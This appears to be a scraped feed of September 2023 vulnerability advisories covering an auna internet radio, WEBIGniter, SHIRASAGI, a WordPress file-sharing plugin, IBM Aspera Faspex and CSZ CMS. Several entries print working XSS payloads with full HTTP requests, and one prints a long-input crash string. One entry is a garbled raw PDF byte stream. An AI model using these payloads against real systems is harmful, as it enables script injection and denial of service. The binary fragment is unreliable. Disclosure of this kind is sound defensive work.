Internet Radio auna IR-160 SE using the UIProto firmware suffers from missing authentication, cross site scripting, and denial of service vulnerabilities.

    The internet radio device auna IR-160 SE has multiple vulnerabilities. It uses the firmware UIProto, different versions of which can also be found in many other radios.1. The firmware offers a rudimentary web API that can be reached on the local network on port 80. This API is completely unauthenticated, allowing anyone to control the radio over the local network. (already known as CVE-2019-13474, but relevant for the other two findings) [1] [2] [3]2. The web UI does not encode user input, resulting in a XSS vulnerability, e.g. when changing the device name as follows:http://192.168.178.93/set_dname?name=><script>alert(1)</script>3. The firmware crashes when sending a device name longer than 84 characters. Some parts of the firmware will recover afterwards and music will play again after a few seconds, but the service on port 80 remains borked until the radio is reset using the switch on the back. This may or may not be a memory corruption vulnerability. I don't feel like analyzing this any further, but it certainly looks kinda fucked..../set_dname?name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaFor other vulnerabilities in UIProto see CVE-2019-13473 and CVE-2019-13474 discovered by Benjamin K.M. These reports also mention other devices that are possibly affected by this as well.Also, if anyone knows how to re-enable telnetd on the patched version of UIProto, please let me know!Love,naphthalin[1] https://github.com/kayrus/iradio[2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio[3] https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

Internet Radio auna IR-160 SE UIProto DoS / XSS / Missing Authentication

WEBIGniter version 28.7.23 suffers from a cross site scripting vulnerability.

    ## Title: WEBIGniter-28.7.23-XSS-Reflected## Author: nu11secur1ty## Date: 09/04/2023## Vendor: https://webigniter.net/## Software: https://webigniter.net/demo## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the redirect request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks. The payload ycsz3"><script>alert(1)</script>bn76w was submittedin the redirect parameter. This input was echoed unmodified in theapplication's response.By using this Java Script injection, the attacker can trick a lot ofusers into visiting his dangerous URL which is reflected on the loginform, before they log in, warning them that there is a problem withthe login, which is very nasty and DANGEROUS!## Staus: HIGH Vulnerability[+]Paylod:```GETGET /cms/login?redirect=cmsycsz3%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebn76wHTTP/1.1Host: demo.webigniter.netAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-xss-reflected.html)## Time spent:01:35:00

WEBIGniter 28.7.23 Cross Site Scripting

Path traversal vulnerability in SHIRASAGI prior to v1.18.0  allows a remote authenticated attacker to alter or create arbitrary files on the server, resulting in arbitrary code execution.

Published:2023/09/04  Last Updated:2023/09/04

**Overview**

SHIRASAGI contains multiple vulnerabilities.

**Products Affected**

*   SHIRASAGI versions prior to v1.18.0

**Description**

SHIRASAGI provided by SHIRASAGI Project contains multiple vulnerabilities listed below.

*   **Reflected cross-site scripting (CWE-79)** - CVE-2023-36492
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 6.1**
    
    CVSS v2
    
    AV:N/AC:H/Au:N/C:N/I:P/A:N
    
    **Base Score: 2.6**
    
*   **Stored cross-site scripting (CWE-79)** - CVE-2023-38569
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 5.4**
    
    CVSS v2
    
    AV:N/AC:M/Au:S/C:N/I:P/A:N
    
    **Base Score: 3.5**
    
*   **Path traversal (CWE-22)** - CVE-2023-39448
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    
    **Base Score: 4.3**
    
    CVSS v2
    
    AV:N/AC:L/Au:S/C:N/I:P/A:N
    
    **Base Score: 4.0**
    

**Impact**

*   A remote attacker may execute an arbitrary script on the web browser of the user who is logging in to the product - CVE-2023-36492, CVE-2023-38569
*   A user of the product may alter or create arbitrary files on the server, resulting in arbitrary code execution - CVE-2023-39448

**Solution**

**Update the Software**  
Update to the latest version according to the information provided by the developer.  
The developer has released the version listed below that addresses the vulnerabilities.

*   SHIRASAGI v1.18.0

For more information, refer to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

CVE-2023-36492, CVE-2023-38569  
Taiga Shirakura of Mitsui Bussan Secure Directions, Inc. reported these vulnerabilities to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

CVE-2023-39448  
Masashi Yamane of LAC Co., Ltd. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2023-39448: JVN#82758000: Multiple vulnerabilities in SHIRASAGI

Stored cross-site scripting vulnerability in Map setting page of VI Web Client prior to 7.9.6 allows a remote authenticated attacker to inject an arbitrary script.

%PDF-1.7 %���� 1 0 obj <>/Metadata 2236 0 R/ViewerPreferences 2237 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/Font<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 612 792\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��\[\_o�67�����6�ER�CQ NRǇ:�َS�탼��E׻�$'ȡ�f���^�+uW��������p��fH�����u:)�O?��.�tr�\]���������Oқ�<-������e���g�U���3;x����E�������t�B�C)��K�4�,�vw>���;2Lx Y��G\*R\\�7&w�;�Gw�M����Qx��%\_��I�)��;�&Bv~��#�<܉C�Bf�� �9�� >

CVE-2023-40705

The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

**Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')**

CVE

CVE-2023-4636

CVSS

4.4 (Medium)

Publicly Published

September 4, 2023

Last Updated

September 5, 2023

Researcher

Shuning Xu  

**Description**

The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered\_html has been disabled.

**References**

*   github.com
*   plugins.trac.wordpress.org

**Share**

**1 affected software package**

Software Type

Plugin

Software Slug

user-private-files (view on wordpress.org)

Patched?

Yes

Remediation

Update to version 2.0.4, or a newer patched version

Affected Version

*   <= 2.0.3

Patched Version

*   2.0.4

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

All the threat data shared in this database is powered by **Wordfence Intelligence Enterprise**.  
Interested in integrating this data into your platform or network?  
Contact us now to discuss API access to our Wordfence Intelligence Enterprise Data Feeds.

Inquire Now

Want to get notified of the latest vulnerabilities that may affect your WordPress site?  
Install Wordfence on your site today to get notified immediately if your site is affected by a vulnerability that has been added to our database.

Get Wordfence

The Wordfence Intelligence WordPress vulnerability database is completely free to access and query via API. Please review the documentation on how to access and consume the vulnerability data via API.

Documentation

CVE-2023-4636: WordPress File Sharing Plugin <= 2.0.3 - Authenticated (Admin+) Stored Cross-Site Scripting — Wordfence Intelligence

IBM Aspera Faspex 5.0.5 could allow a remote attacked to bypass IP restrictions due to improper access controls.  IBM X-Force ID:  259649.

**Security Bulletin**

  

**Summary**

This Security Bulletin addresses security vulnerabilities that have been remediated in IBM Aspera Faspex 5.0.6

**Vulnerability Details**

**CVEID:**   CVE-2023-22870  
**DESCRIPTION:**   IBM Aspera Faspex transmits sensitive information in cleartext which could be obtained by an attacker using man in the middle techniques.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/244121 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-35906  
**DESCRIPTION:**   IBM Aspera could allow a remote attacked to bypass IP restrictions due to improper access controls.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/259649 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-22405  
**DESCRIPTION:**   IBM Aspera Faspex 5 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222576 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-24965  
**DESCRIPTION:**   IBM Aspera Faspex 5 does not restrict or incorrectly restricts access to a resource from an unauthorized actor.  
CVSS Base score: 5.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/246713 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)

**CVEID:**   CVE-2023-30995  
**DESCRIPTION:**   IBM Aspera Faspex could allow a malicious actor to bypass IP whitelist restrictions using a specially crafted HTTP request.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/254268 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2022-22409  
**DESCRIPTION:**   IBM Aspera Faspex 5 could allow a remote attacker to gather sensitive information about the web application, caused by an insecure configuration.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222592 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-22401  
**DESCRIPTION:**   IBM Aspera Faspex 5 could allow a remote attacker to gather or persuade a naive user to supply sensitive information.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222567 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2022-22402  
**DESCRIPTION:**   IBM Aspera Faspex 5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222571 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Aspera Faspex

5.0.5 and prior

**Remediation/Fixes**

It is recommended to apply the fix as soon as possible, see link below.

**Product**

**Fixing VRM**

**Platform**

**Link to Fix**

IBM Aspera Faspex

5.0.6

Linux

click here

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

IBM PTC Pentesting Team, IBM X-Force Red Team, HCL AppScan, HackerOne

**Change History**

29 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSXMXJ","label":"IBM Aspera Faspex On Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"3.7","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSHI916","label":"IBM Aspera Enterprise On Demand"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSQ65JJ","label":"IBM Aspera Enterprise"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS8NDZ","label":"IBM Aspera"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSGPEF","label":"IBM Aspera Faspex"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"5.0","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-35906: Security Bulletin: IBM Aspera Faspex 5.0.6 has addressed multiple vulnerabilities (CVE-2023-22870, CVE-2023-35906, CVE-2022-22405, CVE-2023-24965, CVE-2023-30995, CVE-2022-22409, CVE-2022-22401, CVE-2

CSZ CMS version 1.3.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')# Date: 2023/08/18# CVE: CVE-2023-38911# Exploit Author: Daniel González# Vendor Homepage: https://www.cszcms.com/# Software Link: https://github.com/cskaza/cszcms# Version: 1.3.0# Tested on: CSZ CMS 1.3.0# Description:# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.# Steps to reproduce Stored XSS:Go to url http://localhost/admin/plugin/gallery/edit/2.When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.With the following payload we can achieve the XSSPayload:<div><p title="</div><svg/onload=alert(document.domain)>">#PoC Request:POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 140Origin: http://localhost:8080Referer: http://localhost:8080/admin/plugin/gallery/edit/2Upgrade-Insecure-Requests: 1gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )# Date: 2023/08/18# CVE: CVE-2023-38910# Exploit Author: Daniel González# Vendor Homepage: https://www.cszcms.com/# Software Link: https://github.com/cskaza/cszcms# Version: 1.3.0# Tested on: CSZ CMS 1.3.0# Description:# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin.# Steps to reproduce Stored XSS:Go to url http://localhost/admin/carousel.We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields.We can inject HTML code.With the following payload we can achieve the XSS.Payload:<div><p title="</div><svg/onload=alert(document.domain)>">#PoC Request:POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 137Origin: http://localhost:8080Referer: http://localhost:8080/admin/carousel/edit/3Upgrade-Insecure-Requests: 1carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

CSZ CMS 1.3.0 Cross Site Scripting

The 123.chat WordPress plugin before 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2023-4298

The Post Timeline WordPress plugin before 2.2.6 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVE-2023-4284

The AI ChatBot WordPress plugin before 4.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

Tag

#xss